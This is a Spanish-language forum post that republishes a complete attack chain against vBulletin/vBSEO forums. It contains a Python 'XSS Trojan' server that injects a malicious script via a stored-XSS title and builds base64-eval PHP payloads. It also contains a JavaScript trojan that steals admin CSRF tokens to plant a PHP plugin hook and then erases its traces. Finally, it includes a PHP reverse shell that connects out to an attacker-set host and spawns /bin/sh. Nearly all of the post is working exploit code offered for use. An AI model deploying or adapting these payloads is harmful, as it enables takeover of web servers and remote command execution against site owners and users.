Trojan XSS - Evilwebtool (From XSS to Reverse Shell [PHP])
Publicado: 14 Feb 2011, 06:40
Código: Seleccionar todo
#!/usr/bin/env python
#
# License: Attribution-ShareAlike 3.0 Unported
# http://creativecommons.org/licenses/by-sa/3.0/
import sys
import re
import random
import httplib
import base64
import socket
from socket import gethostname
from os import curdir, sep
from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
def title():
banner = """
/*****************************************\\
| vBSEO XSS Trojan |____/\______o____//\\\_|
| Version: 1.3.2 | / \/\ #"=- //\\\ |
| Author: MaXe | / \ \ /\ || |
|-----------------------------------------|
| Educational Purposes Only | XSS is not |
|---------------------------| a big deal. |
| http://www.intern0t.net | Or is it..? |
\\*****************************************/
"""
return banner
# /**************************\
# | SERVER CONFIGURATION |
# \**************************/
# socket.getaddrinfo(socket.gethostname(), None)[0][4][0]
# socket.gethostbyname(socket.gethostname())
# The above methods seemed to be buggy on Linux, but worked fine on Windows (XP)
host = '' # You need to set this manually.
port = 1234 # You may need to edit this too. This exploit was tested with port 80.
# /*************************\
# | PAYLOAD CONFIGURATION |
# \*************************/
# Do not edit these unless you know what you're doing. (Avoid common pattern detection)
evil_php = "%s%s%s" % (random.randrange(0, 253),random.randrange(1, 256),random.randrange(0, 255))
evil_jsf = "%s%s%s" % (random.randrange(1, 257),random.randrange(0, 254),random.randrange(1, 258))
payload_file = "trojan.js" # Javascript file containing our payload - This file needs to exist locally
xss_title = 'The Friendly Website" size="70" dir="ltr" tabindex="1"><script src="http://%s:%s/%s.js"></script><br ' % (host,port,evil_jsf)
toHex = lambda x:'\\x'.join([hex(ord(c))[2:].zfill(2) for c in x]) # Encodes input into \xHH format
# /*************************\
# | PAYLOAD PREPARATION |
# \*************************/
def prepPayload():
try:
payload_buff = open(payload_file)
global payload_new
print "\n[?] Do you wish enter code or get a reverse shell?"
theoption = raw_input("[+] Type 'code' or 'shell' please: ")
if theoption == 'code':
payload_input = "if($_GET['hax0r1tn0w']=='true') { "
payload_input += raw_input("[+] Enter code without PHP tags: ")
payload_input += " }"
payload_insert = "eval(base64_decode(\""+base64.b64encode(payload_input)+"\"));" # Was changed from Hex to Base64
payload_replace = re.compile('(PHP_PAYLOAD)')
payload_new = payload_replace.sub(payload_insert, payload_buff.read())
elif theoption == 'shell':
payload_shell = open('extras/php-reverse-shell-1.0/php-reverse-shell.php')
localhost = raw_input("[+] Enter an IP-address: ")
localport = raw_input("[+] Enter a local port: ")
find_host = re.compile('(LOCALHOST)')
add_host = find_host.sub(localhost,payload_shell.read())
find_port = re.compile('(LOCALPORT)')
add_port = find_port.sub(localport,add_host)
stripcomments = re.compile('//.*?\n|/\*.*?\*/')
filepart1 = stripcomments.sub('', add_port)
stripspace = re.compile('[\t\n]')
filepart2 = stripspace.sub('', filepart1)
payload_input_shell = "if($_GET['hax0r1tn0w']=='true') { %s } " % filepart2
payload_insert = "eval(base64_decode(\""+base64.b64encode(payload_input_shell)+"\"));" # Was changed from Hex to Base64
payload_replace = re.compile('(PHP_PAYLOAD)')
payload_new = payload_replace.sub(payload_insert, payload_buff.read())
print "[*] Start netcat before you proceed: nc -lv %s %s" % (localhost,localport)
print "[?] This must be done in another window than where the server is listening."
else:
print "[!] You did not type 'code' or 'shell', exiting script.."
sys.exit(0)
except KeyboardInterrupt:
print '\n[*] CTRL+C received, exiting script..'
sys.exit(0)
# /**************************\
# | TARGET CONFIGURATION |
# \**************************/
if sys.argv[1:]:
target_link = sys.argv[1]
else:
target_link = ''
class MyHandler(BaseHTTPRequestHandler):
def do_GET(self):
try:
if self.path.endswith("%s.php" % evil_php): # This will be our dynamic extension for injection
self.send_response(200)
self.send_header('Content-type','text/html')
self.end_headers()
self.wfile.write('<html><head><title>%s</title>' % xss_title)
self.wfile.write('</head><body><center><h1>vBSEO XSS Trojan</h1><br /><br />')
self.wfile.write('<a href="%s" target="_blank">Click This to Begin Injection</a>' % target_link)
self.wfile.write('</center></body></html>')
return
if self.path.endswith("%s.js" % evil_jsf): # These files must be in plain text.
f = open('%s' % payload_file)
self.send_response(200)
self.send_header('Content-type', 'text/plain')
self.end_headers()
self.wfile.write(payload_new)
f.close()
return
if self.path.endswith(""): # This is will show our main index file
f = open('index.html')
self.send_response(200)
self.send_header('Content-type', 'text/html')
self.end_headers()
self.wfile.write(f.read())
f.close()
return
return
except IOError:
self.send_error(404,'File Not Found: %s' % self.path)
def assess():
try:
yesorno = raw_input("[?] Do you want to check if the target is vulnerable?\n[+] Type 'yes' or 'no' please: ")
if yesorno == "yes":
print "\n[?] Specify the target like this: http://forum-site.tld"
ctarget = raw_input("[+] Please input target: ")
# Strip away http and https from the target variable.
striptarget = re.compile('(http://|https://)')
newtarget = striptarget.sub('', ctarget)
# Make the connection to the vulnerable file
conn = httplib.HTTPConnection(newtarget, 80)
print "[*] Checking if site appears to be vulnerable."
conn.request("GET", "/sup3rs3cr3t/vbseocp.php")
resp = conn.getresponse()
output = resp.read()
# If the file was found and we have access to it (200 OK)
if resp.status == 200:
print "[*] Website is responding, this is good."
if re.search("(<title>vBSEO Control Panel, vBSEO v.3.5.2</title>)", output):
print ">> The site appears to be vulnerable! (Version 3.5.2)"
elif re.search("(<title>vBSEO v.3.3.2</title>)", output):
print ">> The site appears to be vulnerable! (Version: 3.3.2)"
else:
print "[!] The site does not run vBSEO 3.3.2 nor 3.5.2, but may still be vulnerable."
else:
print '[-] Server did not respond with a 200 OK message, continuing script execution.'
elif yesorno == "no":
print "[*] Starting server, continuing script execution."
else:
print "[*] You didn't type yes or no, continuing script execution."
except KeyboardInterrupt:
print '\n[*] CTRL+C received, continuing script execution.'
def main():
try:
if len(sys.argv) != 2:
print title()
print '[!] You need to specify a target before this script will run.'
print '[?] Check out the source for further customizations.\n'
print 'Usage: %s target' % __file__
print 'Example: %s http://forum-site.tld/1234-a-nice-thread.html' % __file__
else:
if host == '':
print title()
print '[!] You need to edit the host variable in the source.'
else:
assess()
prepPayload()
server = HTTPServer((host, port), MyHandler)
print '\n\t/**************************\\'
print '\t| Started Evil HTTP Server |'
print '\t\\**************************/\n'
print '[*] Serving attack file from: http://%s:%s/%s.php ' % (host,port,evil_php)
print '[*] Serving payload file from: http://%s:%s/%s.js \n' % (host,port,evil_jsf)
print '[!] Browse to: "misc.php?hax0r1tn0w=true", to activate the payload.'
print '[?] Press CTRL+C to stop the server and exit the script. \n'
print '-------------- HTTP Requests Below --------------'
#server.serve_forever() # You need to uncomment this line for the script to work.
except KeyboardInterrupt:
print '[*] CTRL+C received, shutting down Evil HTTP Server.'
server.socket.close()
if __name__ == '__main__':
main()Troyano en javascript
Código: Seleccionar todo
/********************************\
|* vBulletin XSS Trojan *|
|* Developed by: MaXe *|
|* Version: 2.8.5 Final *|
|* Site: www.intern0t.net *|
|********************************|
|* Educational Purposes Only! *|
\********************************/
/* Special thanks to: eXeDK *\
|********************************|
|* CSRF Bypass Reference: *|________________________________________
|* http://rstcenter.com/forum/17987-using-xss-bypass-csrf-protection.rst *|
\*************************************************************************/
function silent_inject() {
// Read and save the adminhash + securitytoken - Bypass the CSRF protection
var adminhash = top.document.getElementById('silent_frame').contentDocument.cpform.adminhash.value;
var securitytoken = top.document.getElementById('silent_frame').contentDocument.cpform.securitytoken.value;
// A hidden vBulletin plugin payload
var form_input = '\
<input type="hidden" name="do" value="update" />\
<input type="hidden" name="adminhash" value="'+adminhash+'" />\
<input type="hidden" name="securitytoken" value="'+securitytoken+'" />\
<input type="hidden" name="product" value="vbulletin" />\
<input type="hidden" name="hookname" value="misc_start" />\
<input type="hidden" name="title" value="injected_haxx" />\
<input type="hidden" name="executionorder" value="5" />\
<input type="hidden" name="phpcode" value=\'PHP_PAYLOAD\' />\
<input type="hidden" name="active" value="1" />\
<input type="hidden" name="pluginid" value="" />\
';
// A function which silently injects our hidden payload form
function silent_form_inject(action,method,content) {
var silent_main_tag = document.createElement('form');
// The inner contents of our form is equal to the content variable
silent_main_tag.innerHTML = ' '+content;
top.document.getElementById('silent_frame').contentDocument.body.appendChild(silent_main_tag);
silent_main_tag.setAttribute('id','intern0t');
silent_main_tag.setAttribute('name','intern0t');
silent_main_tag.setAttribute('action',action);
silent_main_tag.setAttribute('method',method);
}
// Initiate the second silent injection into our iframe
silent_form_inject('plugin.php?do=update','POST',form_input);
// Send our payload automatically - There's no turning back now
if (document.cookie.indexOf("XSS_Infected") == -1) {
top.document.getElementById('silent_frame').contentDocument.getElementById('intern0t').submit();
SetCookie("XSS_Infected","true"); // Prevent re-infection / loops
}
// Give the malicious linkback 2 secs to inject a small payload, before self-removal
var end = setTimeout("clean_up()",2000);
}
// Delete all LinkBacks on the current page - Including ours
function clean_up() {
js_check_all_option(document.linkbacks, -1);
document.linkbacks.submit();
}
// A function to create a cookie so the infection happens only once
function SetCookie(cookieName,cookieContent) {
var cookiePath = '/';
var expDate=new Date();
expDate.setTime(expDate.getTime()+372800000);
var expires=expDate.toGMTString();
document.cookie=cookieName+"="+escape(cookieContent)+";path="+escape(cookiePath)+";expires="+expires;
}
// If our cookie is not present, continue
if (document.cookie.indexOf("XSS_Infected") == -1) {
// Append a (hidden) iframe for stealthy data injection
var mainframe = document.createElement("iframe");
mainframe.setAttribute('id', 'silent_frame');
top.document.body.appendChild(mainframe);
mainframe.setAttribute('onload', 'main.silent_inject()');
mainframe.setAttribute('src', 'plugin.php?do=add');
}
Código: Seleccionar todo
// php-reverse-shell - A Reverse Shell implementation in PHP
// Copyright (C) 2007 [email protected]
//
// This tool may be used for legal purposes only. Users take full responsibility
// for any actions performed using this tool. The author accepts no liability
// for damage caused by this tool. If these terms are not acceptable to you, then
// do not use this tool.
//
// In all other respects the GPL version 2 applies:
//
// This program is free software; you can redistribute it and/or modify
// it under the terms of the GNU General Public License version 2 as
// published by the Free Software Foundation.
//
// This program is distributed in the hope that it will be useful,
// but WITHOUT ANY WARRANTY; without even the implied warranty of
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
// GNU General Public License for more details.
//
// You should have received a copy of the GNU General Public License along
// with this program; if not, write to the Free Software Foundation, Inc.,
// 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
//
// This tool may be used for legal purposes only. Users take full responsibility
// for any actions performed using this tool. If these terms are not acceptable to
// you, then do not use this tool.
//
// You are encouraged to send comments, improvements or suggestions to
// me at [email protected]
//
// Description
// -----------
// This script will make an outbound TCP connection to a hardcoded IP and port.
// The recipient will be given a shell running as the current user (apache normally).
//
// Limitations
// -----------
// proc_open and stream_set_blocking require PHP version 4.3+, or 5+
// Use of stream_select() on file descriptors returned by proc_open() will fail and return FALSE under Windows.
// Some compile-time options are needed for daemonisation (like pcntl, posix). These are rarely available.
//
// Usage
// -----
// See http://pentestmonkey.net/tools/php-reverse-shell if you get stuck.
set_time_limit (0);
$VERSION = "1.0";
$ip = 'LOCALHOST'; // CHANGE THIS
$port = LOCALPORT; // CHANGE THIS
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;
// NOTE: This was moved to the beginning since it should be declared before being used.
// Like print, but does nothing if we've daemonised ourself
// (I can't figure out how to redirect STDOUT like a proper daemon)
function printit ($string) {
if (!$daemon) {
print "$string\n";
}
}
//
// Daemonise ourself if possible to avoid zombies later
//
// pcntl_fork is hardly ever available, but will allow us to daemonise
// our php process and avoid zombies. Worth a try...
if (function_exists('pcntl_fork')) {
// Fork and have the parent process exit
$pid = pcntl_fork();
if ($pid == -1) {
printit("ERROR: Can't fork");
exit(1);
}
if ($pid) {
exit(0); // Parent exits
}
// Make the current process a session leader
// Will only succeed if we forked
if (posix_setsid() == -1) {
printit("Error: Can't setsid()");
exit(1);
}
$daemon = 1;
} else {
printit("WARNING: Failed to daemonise. This is quite common and not fatal.");
}
// Change to a safe directory
chdir("/");
// Remove any umask we inherited
umask(0);
//
// Do the reverse shell...
//
// Open reverse connection
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
printit("$errstr ($errno)");
exit(1);
}
// Spawn shell process
$descriptorspec = array(
0 => array("pipe", "r"), // stdin is a pipe that the child will read from
1 => array("pipe", "w"), // stdout is a pipe that the child will write to
2 => array("pipe", "w") // stderr is a pipe that the child will write to
);
$process = proc_open($shell, $descriptorspec, $pipes);
if (!is_resource($process)) {
printit("ERROR: Can't spawn shell");
exit(1);
}
// Set everything to non-blocking
// Reason: Occsionally reads will block, even though stream_select tells us they won't
stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0);
printit("Successfully opened reverse shell to $ip:$port");
while (1) {
// Check for end of TCP connection
if (feof($sock)) {
printit("ERROR: Shell connection terminated");
break;
}
// Check for end of STDOUT
if (feof($pipes[1])) {
printit("ERROR: Shell process terminated");
break;
}
// Wait until a command is end down $sock, or some
// command output is available on STDOUT or STDERR
$read_a = array($sock, $pipes[1], $pipes[2]);
$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
// If we can read from the TCP socket, send
// data to process's STDIN
if (in_array($sock, $read_a)) {
if ($debug) printit("SOCK READ");
$input = fread($sock, $chunk_size);
if ($debug) printit("SOCK: $input");
fwrite($pipes[0], $input);
}
// If we can read from the process's STDOUT
// send data down tcp connection
if (in_array($pipes[1], $read_a)) {
if ($debug) printit("STDOUT READ");
$input = fread($pipes[1], $chunk_size);
if ($debug) printit("STDOUT: $input");
fwrite($sock, $input);
}
// If we can read from the process's STDERR
// send data down tcp connection
if (in_array($pipes[2], $read_a)) {
if ($debug) printit("STDERR READ");
$input = fread($pipes[2], $chunk_size);
if ($debug) printit("STDERR: $input");
fwrite($sock, $input);
}
}
fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);
Fuente: [Enlace externo eliminado para invitados] ... php-shell/